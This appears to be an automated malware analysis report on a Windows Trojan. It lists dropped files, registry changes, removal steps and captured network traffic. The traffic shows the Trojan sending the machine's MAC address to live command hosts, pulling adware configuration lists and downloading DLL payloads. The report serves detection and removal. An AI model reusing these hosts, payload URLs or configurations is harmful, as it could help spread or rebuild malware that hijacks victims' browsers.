The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 72 F7 B1 07 EF 3D C4 60 2B 2F D5 80 99 C1 E7"
Dropped PE files
MD5 | File path |
---|---|
cf1cdb854f655fd69597335e96de6792 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4.tmp |
75434d6228364bfd1102c97edd346485 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA27678.tmp |
1fad2419bc27270ef354b4cd18ea29fe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA6871.tmp |
73e40295ab0e0c740b114b9251042b87 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA8273.tmp |
bd79d4230e8cf291fefc260a1b1030c0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBC263.TMP |
d4424c25155d688f00f89bfa6d2bc534 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBIC753.TMP |
9484c04258830aa3c2f2a70eb041414c | c:\WINDOWS\system32\mswinsck.ocx |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 118784 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 122880 | 118784 | 115712 | 5.53848 | b72c9776fd3a7b7dc02aae29753eda36 |
.rsrc | 241664 | 4096 | 512 | 2.49332 | 5d5a0a9007054812fac418762132b2f3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
e4296b98643be0faa0f61186d64462cb
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1
User-Agent: vb wininet
Host: mactj.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD; path=/
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)
Connection: keep-alive
err!
GET //send/safeen.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.1313k.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 08:57:04 GMT
Content-Length: 2942
Content-Type: text/plain
Last-Modified: Sat, 24 Sep 2016 02:08:11 GMT
Accept-Ranges: bytes
ETag: "9e7c6380816d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:3 (Cdn Cache Server V2.0), 1.1 jsycdx41:6 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/InsertWnd_enlc.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.1313k.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 22:35:39 GMT
Content-Length: 124416
Content-Type: application/x-msdownload
Last-Modified: Fri, 08 Jul 2016 12:31:29 GMT
Accept-Ranges: bytes
ETag: "5828f9a614d9d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /file.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.pc918.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 07:55:10 GMT
Content-Length: 199
Content-Type: text/plain
Last-Modified: Fri, 20 May 2016 16:38:12 GMT
Accept-Ranges: bytes
ETag: "a86150b6b2d11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[Basic]
Url1=hXXp://VVV.topyouxi.net/osm.dll
Url2=hXXp://down.v718.com/osm.dll
md5=65F7B70B548389ADE039D1804C893694
Filepath=
dll=
ExeName=
config=hXXp://user.yswm.net/yswm/
Jm=1
time=6000
GET /yswm/taian.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.yswm.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 12:29:07 GMT
Content-Length: 503
Content-Type: application/vnd.rn
Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT
Accept-Ranges: bytes
ETag: "3679b94fba96d11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
[UnionID]
Url=
Guide=
Sgdh=
Bho=
Tanghulu=
Ico=
NewExitPOP=
Sgtp=
RDC=
cpush=
soso=
lm=
JianGuanUrl=taian.htm

[Pro]
Name=

[Close]
Url=
Sgdh=
Guide=
Bho=
Tanghulu=
Ico=
NewExitPOP=
Sgtp=
RDC=
cpush=
jzyxj=
app=
send=
urltcpai=

[Index]
Safe=newlock@onepro

[UserSet]
Blk=
Webfile=
Close=sogoujcclose@xcyclose@lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@addjc@tcclose@spslclose@titleclose
noweb=
prisafe=
<<< skipped >>>
GET /yswm/Spid_jc_id.ini HTTP/1.1
User-Agent: RookIE/1.0
Host: user.yswm.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 05:12:33 GMT
Content-Length: 6
Content-Type: application/vnd.rn
Last-Modified: Mon, 12 Oct 2015 02:30:03 GMT
Accept-Ranges: bytes
ETag: "4c19d3e6954d11:a3bc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
9904
GET /icdata.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.369k.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 01:47:22 GMT
Content-Length: 136192
Content-Type: application/x-msdownload
Last-Modified: Wed, 21 Sep 2016 01:45:25 GMT
Accept-Ranges: bytes
ETag: "dc41e7d2a913d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:1 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/ico2safe.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.yswm.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 02:57:12 GMT
Content-Length: 58
Content-Type: text/plain
Last-Modified: Wed, 21 Sep 2016 02:27:29 GMT
Accept-Ranges: bytes
ETag: "988b87b3af13d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:0 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)
Connection: keep-alive
GET /send/ico2.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.yswm.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:15:23 GMT
Content-Length: 11304
Content-Type: text/plain
Last-Modified: Wed, 21 Sep 2016 03:13:30 GMT
Accept-Ranges: bytes
ETag: "d0bbba20b613d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:4 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/serList.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:03:22 GMT
Content-Length: 1521
Content-Type: text/plain
Last-Modified: Wed, 03 Aug 2016 02:32:29 GMT
Accept-Ranges: bytes
ETag: "58decd472fedd11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:3 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/pubjc.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 19:05:00 GMT
Content-Length: 147285
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2016 07:01:44 GMT
Accept-Ranges: bytes
ETag: "f4cbe586815d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:10 (Cdn Cache Server V2.0), 1.1 jinh95:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/exitpop.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 572
Content-Type: text/plain
Last-Modified: Mon, 01 Feb 2016 14:47:23 GMT
Accept-Ranges: bytes
ETag: "d479c675ff5cd11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:5 (Cdn Cache Server V2.0), 1.1 jinh94:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[push]
time=5
user=
BaiduClose=
RightClose=
QQClose=
HtcClose=
UrlClose=
JyClose=
TcClose=
DhClose=jingwang@heze
RndClose=
BaiduJcClose=
DhUrl=hXXp://123.sogou.com/?af71105-0003
[pushurl1]
url=http://VVV.168wm.net/pro/index.htm
[url1]
user=
1=VVV.baidu.com
2=wd=
3=pn=
ep=1
url=

[url2]
user=
1=hXXp://VVV.sina.com.cn/
ep=1
url=
[url3]
user=
1=VVV.sogou.com
2=query=
3=page=
ep=1
url=

[url4]
user=
1=VVV.17173.com
ep=1
url=

[url5]
user=
1=user.qzone.qq.com
ep=1
url=
[url6]
user=
1=bbs.yoka.com
ep=1
url=
GET /send/yxjk/yxjpq.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:37:47 GMT
Content-Length: 588
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2016 03:31:31 GMT
Accept-Ranges: bytes
ETag: "44ce4806f2d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
GET /send/eb.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 20:08:36 GMT
Content-Length: 13363
Content-Type: text/plain
Last-Modified: Fri, 12 Dec 2014 08:31:01 GMT
Accept-Ranges: bytes
ETag: "f23f69f6e515d01:a55b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/yxjk/jzyxj.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 14:38:20 GMT
Content-Length: 8416
Content-Type: text/plain
Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT
Accept-Ranges: bytes
ETag: "48afbf2c0eed11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/tfgg.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 454
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2016 02:15:19 GMT
Accept-Ranges: bytes
ETag: "144bbaaee083d11:a404"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)
Connection: keep-alive
placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlcode/227..placeid=227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.duoqu.com/lt.html__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.tv/burning?chan=28..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..hXXp://VVV.game485.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agrt.html?id=153521&p=i..907046..907811..906081..907810..120435..xuanchuanyiunion.cpm..fzcg.zhengheinc.com..90360772_hao_pg
<<< skipped >>>
GET /send/prosafe.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:28:17 GMT
Content-Length: 845
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2016 03:19:29 GMT
Accept-Ranges: bytes
ETag: "c8f02e2c7ff3d11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
hintplugin.exe@*hintplugin.exe@rzxcline.exe@rzxmon.exe@rzxsvc.exe@rwyclient.exe@rwyncmc.exe@svchost.exe@wcsadenr.exe@*clsmn.exe@gamelauncher.exe@netbarplayer.exe@skyrfilm.exe@rocalres.exe@*coobarclt.exe@*crossfire.exe@\................\@\......\hqg.exe@\matchlobby.exe@hdzy.exe@ltlogger.exe@......online......@\xmp\program\xpm.exe@\pstyle\qyclient.exe@\........2......\@\..............\launcher\launcher.exe@nbms.exe@jknbms.exe@cycslogin.exe@........\....\autoupdate.exe@\........\cqby.exe@welcome.exe@launch.exe@\........\qkwebgamelogin.exe@\debug\explorer.exe@whclient\whwindow.exe@\....\gamelaunch.exe@9377.............exe@*\tklobby.exe@\tkwebapp.exe@\tkcltnet.exe@\tkassistor.exe@\tklobby.exe@\jjgame\@\JJ......\@\gamemenu\bin@hintclient.exe@*temp\temp\system.exe@*\Temp\Temp\@7fgame.exe@lshdw.exe@yy.exe@yygame.exe@\........\@xy2_launch.exe....
GET /send/addjs/jslist.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 13:30:20 GMT
Content-Length: 7956
Content-Type: text/plain
Last-Modified: Mon, 05 Sep 2016 01:23:27 GMT
Accept-Ranges: bytes
ETag: "f6816a1a147d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:3 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/jzjc/jzjc.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 154
Content-Type: text/plain
Last-Modified: Thu, 25 Feb 2016 08:27:14 GMT
Accept-Ranges: bytes
ETag: "a2b9ca54a66fd11:a413"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:8104 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)
Connection: keep-alive
tgp_render.exe^..gamelauncher.exe^..\qq.exe^..runme.exe^..clsmn.exe^..wxlltaidex.exe^..pubwinclient.exe^..svchost.exe^..jknbmsnew.exe^..barblientview.exe^....
GET /send/jzjc/jzurl.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 1224
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2016 02:42:45 GMT
Accept-Ranges: bytes
ETag: "42ecb986473d11:a404"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:8080 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /send/newDomain.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:23:19 GMT
Content-Length: 21
Content-Type: text/plain
Last-Modified: Fri, 24 Jun 2016 03:06:00 GMT
Accept-Ranges: bytes
ETag: "10baa56c5cdd11:a55b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:1 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)
Connection: keep-alive
hXXp://VVV.yaojyw.net
GET /send/jwico.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.v138.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 47
Content-Type: text/plain
Last-Modified: Wed, 07 Jan 2015 05:43:26 GMT
Accept-Ranges: bytes
ETag: "689c5fdb3c2ad01:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jinh94:5 (Cdn Cache Server V2.0)
Connection: keep-alive
@fyww@tlww@jingwang1@jingwang2@jingwang3@ahhfjw
GET /send/InsertWnd.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:45:23 GMT
Content-Length: 2402
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2016 03:33:23 GMT
Accept-Ranges: bytes
ETag: "a6b73c436f2d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
*browser..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://yxtt.v138.net/send/yxjtc/iframeyxjlove.htm..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^MozillaWindowClass..2^Maxthon3Cls_MainFrm..2^QQBrowser_WidgetWin_0..3^........3^................3^........3^.................. ..3^..........3^..........3^............3^yswm..3^..........3^485......4^1000^600..5^1..*browserTitle..1^5^40^7^320^270^0^0^300^250^hXXp://yxtt.v138.net/send/yxjtc/ace.htm..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cls_MainFrm..2^MozillaWindowClass..2^QQBrowser_WidgetWin_0..4^1000^700..5^1..*browserVideo..1^820^220^5^215^308^0^0^195^288^hXXp://VVV.168wm.net/sp/t2345.asp?mdstr=..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cls_MainFrm..2^MozillaWindowClass..2^QQBrowser_WidgetWin_0..2^IEFrame..3^..........3^..........4^1000^700..5^1..7^..........7^..........7^......7^soso..7^......7^..........*qq..1^-13^49^6^220^60^0^0^200^40^hXXp://123.1313k.net/send/yxjtc/qqtdb.htm..2^TXGuiFoundation..3^QQ..3^..........3^............3^..............3^......3^......3^..........3^............3^..........3^......3^..........3^..........3^..........3^....Q......3^..........3^...
<<< skipped >>>
GET /send/InsertWnd_2345title_en.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 20:18:02 GMT
Content-Length: 157184
Content-Type: application/x-msdownload
Last-Modified: Mon, 18 Jan 2016 07:42:12 GMT
Accept-Ranges: bytes
ETag: "9af64bec351d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /ip.asp HTTP/1.1
User-Agent: vb wininet
Host: VVV.yswm.net
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA; path=/
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</script>
GET /ip.asp HTTP/1.1
User-Agent: RookIE/1.0
Host: VVV.yswm.net
Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</script>
GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1
User-Agent: vb wininet
Host: mactj.v138.net
HTTP/1.1 302 Redirct
Connection: Close
Pragma: no-cache
Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8;
Content-Length: 0;
GET /ic.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1212.ip138.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Sun, 25 Sep 2016 01:28:56 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSAQSTTRB=BFEOKIHDPKHNBLGOJOJGPKFB; path=/
X-Daa-Tunnel: hop_count=1
